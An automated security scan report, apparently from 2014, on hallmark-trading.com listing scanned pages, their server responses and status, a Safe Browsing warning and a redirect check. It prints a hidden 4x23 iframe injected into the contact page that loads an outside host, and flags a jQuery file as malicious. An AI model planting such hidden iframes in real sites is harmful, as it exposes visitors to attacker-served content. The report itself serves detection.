Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hallmark-trading.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hallmark-trading.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:26 GMT Location: http://www.hallmark-trading.com/ Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/ | 200 OK Content-Length: 3259 Content-Type: text/html | clean |
http://www.hallmark-trading.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3301 Content-Type: application/javascript | clean |
http://hallmark-trading.com/js/mouse_stop.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:28 GMT Location: http://www.hallmark-trading.com/js/mouse_stop.js Server: Apache Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/js/mouse_stop.js | 200 OK Content-Length: 617 Content-Type: application/javascript | clean |
http://hallmark-trading.com/vehicle-search/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:28 GMT Location: http://www.hallmark-trading.com/vehicle-search/ Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/vehicle-search/ | 200 OK Content-Length: 6173 Content-Type: text/html | clean |
http://www.hallmark-trading.com/vehicle-search/../js/jquery-1.4.3.min.js | 200 OK Content-Length: 77814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
document.write(''); document.write(''); (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a.liveFired===this||!k||!k.live||a.button&&a.type==="click")){if(a.namespace)D=RegExp("(^|\\.)"+a.namespace.split(".").join("\\ b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):e===A?parseFloat(c.css(f,d)):this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
| ||
http://hallmark-trading.com/vehicle-search/../js/jquery.ajax.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:30 GMT Location: http://www.hallmark-trading.com/js/jquery.ajax.js Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/js/jquery.ajax.js | 200 OK Content-Length: 1526 Content-Type: application/javascript | clean |
http://hallmark-trading.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:31 GMT Location: http://www.hallmark-trading.com/test404page.js Server: Apache Content-Length: 254 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://hallmark-trading.com/about-us/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:32 GMT Location: http://www.hallmark-trading.com/about-us/ Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/about-us/ | 200 OK Content-Length: 1429 Content-Type: text/html | clean |
http://hallmark-trading.com/contact/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:33 GMT Location: http://www.hallmark-trading.com/contact/ Server: Apache Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/contact/ | 200 OK Content-Length: 3702 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 4x23 src: http://nmsbaseball.com/post.php?id=902040 <iframe name=twitter scrolling=auto frameborder=no align=center height=23 width=4 src=http://nmsbaseball.com/post.php?id=902040> | ||
http://www.hallmark-trading.com/contact/../js/jquery-1.4.3.min.js | 200 OK Content-Length: 77814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
document.write(''); document.write(''); (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a.liveFired===this||!k||!k.live||a.button&&a.type==="click")){if(a.namespace)D=RegExp("(^|\\.)"+a.namespace.split(".").join("\\ b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]):e===A?parseFloat(c.css(f,d)):this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
| ||
http://hallmark-trading.com/contact/../Scripts/AC_RunActiveContent.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:35 GMT Location: http://www.hallmark-trading.com/Scripts/AC_RunActiveContent.js Server: Apache Content-Length: 270 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/scripts/ac_runactivecontent.js | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=VE5700000080 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:35 GMT Location: http://www.hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=VE5700000080 Server: Apache Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=ve5700000080 | 200 OK Content-Length: 5856 Content-Type: text/html | clean |
http://www.hallmark-trading.com/vehicle-search/../js/mouse_stop.js | 200 OK Content-Length: 617 Content-Type: application/javascript | clean |
http://hallmark-trading.com/vehicle-search/enquiry.php?id=ve5700000080 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:37 GMT Location: http://www.hallmark-trading.com/vehicle-search/enquiry.php?id=ve5700000080 Server: Apache Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/vehicle-search/enquiry.php?id=ve5700000080 | 200 OK Content-Length: 4792 Content-Type: text/html | clean |
http://hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=VE5700000077 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:11:37 GMT Location: http://www.hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=VE5700000077 Server: Apache Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hallmark-trading.com/vehicle-search/detail-vehicle-search.php?id=ve5700000077 | 200 OK Content-Length: 6146 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hallmark-trading.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:11:26 GMT
Location: http://www.hallmark-trading.com/
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
GET / HTTP/1.1
Host: hallmark-trading.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:11:26 GMT
Location: http://www.hallmark-trading.com/
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hallmark-trading.com
Referer: http://www.google.com/search?q=hallmark-trading.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hallmark-trading.com
Referer: http://www.google.com/search?q=hallmark-trading.com
Result:
The result is similar to the first query. There are no suspicious redirects found.